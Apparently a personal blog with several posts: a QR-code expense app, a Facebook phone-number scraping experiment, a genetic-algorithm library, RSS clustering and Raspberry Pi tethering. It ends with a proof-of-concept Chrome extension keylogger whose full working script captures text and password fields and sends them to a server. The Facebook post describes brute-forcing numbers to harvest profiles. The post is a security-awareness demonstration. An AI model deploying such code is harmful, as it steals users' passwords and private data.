MicroAccounting Web App

This semester at the university I attended a web programming course, and as part of the final exam I was asked to develop a web application. It would use a Java servlet hosted on Google App Engine, and would store its data in Google's Datastore.

I thought it would be much more useful to make a mobile web app, which is slightly more challenging and something I hadn't practiced much in the past.

The app's goal is to track daily expenses by providing a way to insert, edit and delete transactions.

Of course the whole project was basically boring (which is different from easy), so I decided to add a fun feature: I included a QR code scanner to add transactions automatically, simply by scanning the related QR code.

In the end it has been fun, and as usual I'm writing this blog post to keep track of my work.

A live version of the app is hosted by Google here.

A simple test Microaccounting Store which provides QR codes to test the app is here.

Facebook: searching people by phone number

Looking through the privacy settings of my Facebook profile, I discovered the option that controls who can look you up by the phone number you provided. The default setting is everyone.

This option is probably intended to let users match friends from their phone's contact list, but it works on the desktop site too: you simply enter the phone number in the search box. It works even if you have set your phone number to private, since that is a different option.

This is pretty similar to the kind of matching WhatsApp and similar apps do to find friends, but it is completely different if you consider that in those services you cannot discover additional information, like first and last name, by providing a phone number: you only see the name you stored in your own phonebook.

Using this Facebook feature lets you get a lot of information (Facebook's public profile info) by providing only the number of the person you're interested in. That's interesting.

Of course, to be searchable this way you need to have provided your number to Facebook in some way. But this is more and more common: Facebook asks for it on various occasions, such as for two-step verification, and likely when using the mobile Messenger app.

With that said, this service can be used to match unknown numbers, which is pretty useful [and a little creepy, if you think you can finally find out whose number is written on the toilet wall].

Interested by this possibility, I tried to brute-force the function to create a phonebook of random people from Facebook. I made a program which randomly tries a lot of numbers, waiting for matches in the search box.

Actually, it worked pretty well, and I was able to retrieve something like ~50 phone numbers and the related Facebook profiles by searching phone numbers similar to my own.

The program was set to run forever, but after a while Facebook notified me that I was misusing their services, and asked me to enter a captcha to verify my humanity. 🙂

This method is probably not suitable for retrieving the phone numbers of every Facebook user (actually I still think there's a chance if you have a large number of fake Facebook accounts working simultaneously), but it could be used by some spammers to find a few random numbers and the related public information (likes, hometown, etc.) to perform some targeted advertising.

My very simple Python script is bound to the Italian version of Facebook, but it is essentially very easy: it uses Selenium webdrivers to log in to Facebook and then searches for numbers in the search box, looking for changes in the search suggestions to identify a match.

Since I don't need people to request my Facebook friendship just because I'm in their phonebook, I changed the option value from everyone to friends.

JSGenetic library and new Genetic Environment implementation

I’ve created a little Genetic Algorithm library called JSGenetic, which takes care of the population management of a genetic algorithm.

As a test for this library, I've re-implemented an old project, the Genetic Environment, which is basically a simulation of an environment made of resources (water and food), which spontaneously grow or rain onto the field, and of "animals", which have a genetic code that specifies their behavior given what they see of the environment: they can actually "see" only north, south, east and west. The animals also have a small 4-bit memory, and can tell whether they are running out of water or food.

The genetic code of the animals is initially random, and is progressively processed by the genetic library, which selects the individuals that survive longest.

After some generations, it’s clear that the individuals live longer because of the selection made on their genetic code, which defines how they behave.

The code of the JSGenetic library is on GitHub, and the live example is on my GitHub page at this address.

Hierarchical clustering of blog posts fetched through RSS Feed

Today I tried to implement a simple webapp which retrieves some RSS feeds from a given URL, extracts their content and uses a hierarchical clustering classifier to group them into some kind of categories by content similarity.

Actually, the implementation is really poor, and I'm not even sure it works. Anyway, it's been a long time since I wanted to try some kind of text classifier, and here we are. It extracts the text from the RSS feed, then indexes the words inside it and tries to use them as features for the algorithm. Short posts generally mean bad results, especially without any kind of generalization (tokenization should be the word in this case) of the features. In fact, the results are hardly understandable and I guess they're random.

Anyway, here’s a list of what I (sort of) learned along the way:

  • what is hierarchical clustering (not how it works, though)
  • d3.js graph library basics (very basic basics)
  • how to use NetBeans to develop webapps

That's not so bad for a spare afternoon and evening.

As I said, I didn't implement the algorithm myself; I used a library from GitHub, clusterfck.
Oh, and I also used the jFeed jQuery plugin for parsing the RSS, but I slightly modified it to fetch the content of the entries and not to crash when trying to detect IE.

Here's the link.
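As an added example (not the webapp's code, which relies on clusterfck and jFeed), here is a stand-alone JavaScript version of the pipeline the post describes: tokenize each entry, use word counts as features, then agglomeratively merge the most similar entries until a similarity threshold cuts the tree. ENTRIES, tokenize, vectorize, cosine and cluster are names chosen here, and the feed entries are constructed.

```javascript
// Constructed sample feed entries (not real posts); only the text is used for features.
const ENTRIES = [
  { title: 'A', text: 'Raspberry Pi USB tethering with an Android phone over dhcp' },
  { title: 'B', text: 'Android phone tethering gives the Raspberry Pi internet' },
  { title: 'C', text: 'Genetic algorithm library evolves a population of animals' },
  { title: 'D', text: 'Population of animals evolved by a genetic algorithm' },
  { title: 'E', text: 'Chrome extension keylogger sends passwords to a server' },
];

// Lower-case and keep words of 3+ letters: a crude first step at generalising the features.
function tokenize(text) {
  return text.toLowerCase().match(/[a-z]{3,}/g) || [];
}

// Bag-of-words term counts: the feature vector of one entry.
function vectorize(text) {
  const v = {};
  for (const w of tokenize(text)) v[w] = (v[w] || 0) + 1;
  return v;
}

// Cosine similarity of two sparse vectors (0 when either is empty).
function cosine(a, b) {
  let dot = 0, na = 0, nb = 0;
  for (const w in a) { na += a[w] * a[w]; if (b[w]) dot += a[w] * b[w]; }
  for (const w in b) nb += b[w] * b[w];
  return na && nb ? dot / Math.sqrt(na * nb) : 0;
}

// Agglomerative clustering: merge the two most similar clusters (cosine of their summed
// vectors) until the best similarity drops below the threshold. Returns sorted title lists.
function cluster(entries, threshold) {
  let clusters = entries.map((e, i) => ({ members: [i], vec: vectorize(e.text) }));
  while (clusters.length > 1) {
    let best = { sim: -1, i: 0, j: 0 };
    for (let i = 0; i < clusters.length; i++)
      for (let j = i + 1; j < clusters.length; j++) {
        const sim = cosine(clusters[i].vec, clusters[j].vec);
        if (sim > best.sim) best = { sim, i, j };
      }
    if (best.sim < threshold) break;
    const a = clusters[best.i], b = clusters[best.j];
    const vec = Object.assign({}, a.vec);
    for (const w in b.vec) vec[w] = (vec[w] || 0) + b.vec[w];
    clusters = clusters.filter((_, k) => k !== best.i && k !== best.j);
    clusters.push({ members: a.members.concat(b.members), vec });
  }
  return clusters.map(c => c.members.map(i => entries[i].title).sort())
                 .sort((x, y) => x[0].localeCompare(y[0]));
}
```

cluster(ENTRIES, 0.3) returns [["A","B"],["C","D"],["E"]]; raising the threshold to 0.6 leaves only C and D merged, which is the "short posts mean bad results" effect in miniature.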

Android USB tethering and the Raspberry PI

Here's a post I made on the Google Plus Raspberry PI community back in 2012. Reading it again, I remembered how useful it has actually been, and I didn't want it to get lost 🙂
It explains how to easily share the Internet connection of your Android phone with the Raspberry PI.

“I want to share something I found very interesting and useful in my first tests with the PI.

If you want your PI to access the Internet without ethernet or even outdoors, you can connect it to your Android phone (it may/should work with other phones too) with the USB-microUSB cable, and then activate USB tethering on the phone. This should create a new interface usb0, and simply typing ‘sudo dhclient usb0’ on the PI should get the IP from the phone and use it as router. It works with both 3G and wifi connection active on the phone.

It can be useful to previously edit /etc/network/interfaces adding the line 
“iface usb0 inet dhcp”
in order to make it automatically get the ip when you plug the usb cable and activate the tethering.

Once the PI is connected, you can also connect to it from the smartphone, via ssh or whatever you want, because the phone and the PI are actually connected with ethernet over USB.
To discover the PI's IP from the phone, you should use apps like Fing for Android, scanning the network 192.168.42.0/24, which in my tests (with a Samsung Galaxy Note with ICS) was the network used by the phone's DHCP after connecting it to the PI.

It’s been very useful in my tests because simply editing the interfaces file made me able to control the PI from the smartphone and have it connected to the Internet, without needing a PC to configure anything.

I even managed to run an X server on the phone to display the graphics of applications executed on the PI, even if it was quite slow.

Hope it helps, and sorry for my bad English.”

A thought (and proof-of-concept) about malicious Chrome extensions

Ok, today I made a simple Chrome extension and suddenly got very excited about it (yeah, I know, almost every blog post I write starts like this). Then, reading about what extensions can do, I learned that extensions are not limited by the same-origin policy.

This means that if an extension makes an AJAX request, it can be directed to a server on a domain different from that of the current page. This can be harmful in several different ways; the first I can imagine is a simple keylogger extension which logs everything you type (passwords included) and sends it to a malicious server that collects it.

And that's what I made, just to understand how difficult it was, and what kind of warning the Google Web Store would issue when you decide to add it to your browser.

Making the malicious extension

Actually, since you can inject JavaScript, making the keylogger extension is straightforward: you just have to write two files, a manifest and the script:

manifest.json:

{
  "manifest_version": 2,
  "name": "KeyLogger",
  "description": "This extension logs everything you type.",
  "version": "1.0.1",

  "permissions": [
    "http://*/*", "https://*/*"
  ],

  "content_scripts": [{
    "matches": ["http://*/*", "https://*/*"],
    "js": ["script.js"]
  }]
}

script.js:

var xmlhttp = new XMLHttpRequest();
console.log('Starting keylogger..');

// Every 2 seconds, (re)attach a blur handler to each text/password input and
// textarea on the page, so fields added after page load are covered too.
setInterval(function() {
  var inputs = document.getElementsByTagName('input');
  var textAreas = document.getElementsByTagName('textarea');

  // Sends the field's value to the collecting server as a query string.
  var myLog = function(event) {
    var what = encodeURIComponent(event.srcElement.value);
    console.log("Logged: " + what);
    console.log("Sending data to remote server..");
    xmlhttp.open("GET", "http://localhost/?" + what, true);
    xmlhttp.send();
  };

  // Wraps any handler the page already installed, so the page keeps working.
  var getHandler = function(previousHandler, obj) {
    return function(e) {
      myLog(e);
      if (previousHandler) previousHandler(e);
    };
  };

  for (var i = 0; i < inputs.length; i++) {
    if (inputs[i].getAttribute('type') == 'text' || inputs[i].getAttribute('type') == 'password') {
      inputs[i].onblur = getHandler(inputs[i].onblur, inputs[i]);
    }
  }

  for (var i = 0; i < textAreas.length; i++) {
    textAreas[i].onblur = getHandler(textAreas[i].onblur, textAreas[i]);
  }
}, 2000);

The script is a simple implementation that sends, via AJAX requests, every text you type in a textbox, password fields included. In this simple proof of concept it sends everything to localhost.

I tried it, and it works.

Installing the extension

I published it to the Chrome Web Store and tried to install it, to see what kind of warning would show up, and all I got was this:

[screenshot: keyloggerwarning]

...which is not so uncommon for, say, an ad-blocking extension:

[screenshot: adblockpermissions]


So this blog post is here to remind you that you should use only trusted Chrome extensions. It's very easy to steal your data with a malicious Chrome extension, it's easy to hide some malicious code in an apparently innocent extension, and after you have installed it, it's easy to forget about it.
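The two screenshots make the post's point: the store prompt for this PoC is the same one an ad blocker gets. As an added example (not from the post, and not a Chrome API), here is a small Node script that reads an extension manifest and flags the combination the keylogger depends on, host access to every site plus a content script matched on every page, as a triage step before trusting an extension. isBroadHost and assessManifest are names chosen here; KEYLOGGER_MANIFEST is the post's manifest and NARROW_MANIFEST is a constructed contrast.

```javascript
// Host patterns that grant access to every site: '<all_urls>', or a match
// pattern whose host part is just '*' (http://*/*, https://*/*, *://*/*).
function isBroadHost(pattern) {
  if (pattern === '<all_urls>') return true;
  const m = /^(\*|https?|wss?|ftp):\/\/([^/]+)\//.exec(pattern);
  return m !== null && m[2] === '*';
}

// Triage a parsed manifest. MV2 lists host patterns under "permissions" (as the
// PoC does); MV3 moves them to "host_permissions", so both are read.
function assessManifest(manifest) {
  const hosts = (manifest.permissions || [])
    .concat(manifest.host_permissions || [])
    .filter(isBroadHost);
  const scripts = (manifest.content_scripts || [])
    .filter(cs => (cs.matches || []).some(isBroadHost));
  const findings = [];
  if (hosts.length) findings.push('may send requests to any site: ' + hosts.join(', '));
  for (const cs of scripts) findings.push('injects ' + (cs.js || []).join(', ') + ' into every page');
  // Reading every page AND reaching any server is the pair the keylogger needs;
  // either one alone is common in legitimate extensions (ad blockers included).
  const risk = hosts.length && scripts.length ? 'high'
             : hosts.length || scripts.length ? 'medium' : 'low';
  return { risk, findings };
}

// The PoC's manifest from the post (description omitted).
const KEYLOGGER_MANIFEST = {
  manifest_version: 2, name: 'KeyLogger', version: '1.0.1',
  permissions: ['http://*/*', 'https://*/*'],
  content_scripts: [{ matches: ['http://*/*', 'https://*/*'], js: ['script.js'] }],
};

// Constructed MV3 manifest scoped to a single site, for comparison.
const NARROW_MANIFEST = {
  manifest_version: 3, name: 'SiteHelper', version: '0.1',
  host_permissions: ['https://example.com/*'],
  content_scripts: [{ matches: ['https://example.com/*'], js: ['helper.js'] }],
};

for (const m of [KEYLOGGER_MANIFEST, NARROW_MANIFEST]) {
  console.log(m.name, assessManifest(m));
}
```

A 'high' result only says the extension could read and exfiltrate everything; whether it does is a code-review question the manifest cannot answer.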

Please don’t do bad things with my code and/or ideas.